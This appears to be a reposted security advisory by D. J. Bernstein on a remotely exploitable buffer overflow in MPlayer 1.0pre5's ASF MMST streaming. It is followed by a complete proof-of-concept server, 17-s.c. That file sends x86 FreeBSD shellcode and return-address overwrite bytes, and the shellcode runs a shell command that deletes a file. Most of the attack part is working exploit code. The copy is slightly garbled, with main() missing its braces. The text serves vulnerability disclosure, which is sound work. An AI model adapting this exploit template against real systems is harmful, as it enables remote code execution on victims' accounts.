文章作者:Ariel Berkman
Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has
discovered a remotely exploitable security hole in MPlayer. I'm
publishing this notice, but all the discovery credits should be assigned
to Berkman.
You are at risk if you use MPlayer to play an ASF video stream from the
web (or from any other source that could be controlled by an attacker).
Whoever provides that stream then has complete control over your
account: he can read and modify your files, watch the programs you're
running, etc.
Proof of concept: On an x86 computer running FreeBSD 4.10 with ucspi-tcp
installed, type
wget
http://ftp5.mplayerhq.hu/mplayer/releases/MPlayer-1.0pre5.tar.bz2
bunzip2 < MPlayer-1.0pre5.tar.bz2 | tar -xf -
cd MPlayer-1.0pre5
./configure
gmake
to download and compile the MPlayer program, version 1.0pre5 (current).
Then save the file 17-s.c attached to this message, and type
gcc -o 17-s 17-s.c
tcpserver 0 1755 ./17-s &
./mplayer mmst://127.0.0.1/new_video.asf
with the unauthorized result that a file named x is removed from the
current directory. (I tested this with a 538-byte environment, as
reported by printenv | wc -c.)
Here's the bug: In asf_mmst_streaming.c, get_header() uses get_data()
to copy an input-specified amount of data into a 102400-byte data[]
array.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="17-s.c"
复制内容到剪贴板
代码:
char payload[] = {
0xeb ,0x47
,0x59
,0x89 ,0xca
,0x83 ,0xc2 ,0x18
,0x89 ,0x11
,0x31 ,0xc0
,0x89 ,0x41 ,0x04
,0x83 ,0xc2 ,0x13
,0x89 ,0x51 ,0x08
,0x83 ,0xc2 ,0x08
,0x89 ,0x51 ,0x0c
,0x83 ,0xc2 ,0x03
,0x89 ,0x51 ,0x10
,0x89 ,0x41 ,0x14
,0x88 ,0x41 ,0x2a
,0x88 ,0x41 ,0x32
,0x88 ,0x41 ,0x35
,0x88 ,0x41 ,0x3a
,0x51
,0x83 ,0xc1 ,0x08
,0x51
,0x83 ,0xc1 ,0x20
,0x83 ,0xc1 ,0x03
,0x51
,0x83 ,0xc0 ,0x3b
,0x50
,0xcd ,0x80
,0x31 ,0xc0
,0x50
,0x40
,0x50
,0xcd ,0x80
,0xe8 ,0xb4 ,0xff ,0xff ,0xff
,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;
#include <stdio.h>
main()
char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
printf("hello\n");
fflush(stdout);
len=recv(0,buf,256,0);
printf("hello\n");
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++)
putchar('A');
for (i=0;i<sizeof payload;i++)
putchar (payload[i]);
printf("123");
for (i=0;i<20000;i++) // RA all the way....
putchar(0x01);
putchar(0x15);
putchar(0xbb);
putchar(0xbf);
fflush(stdout);
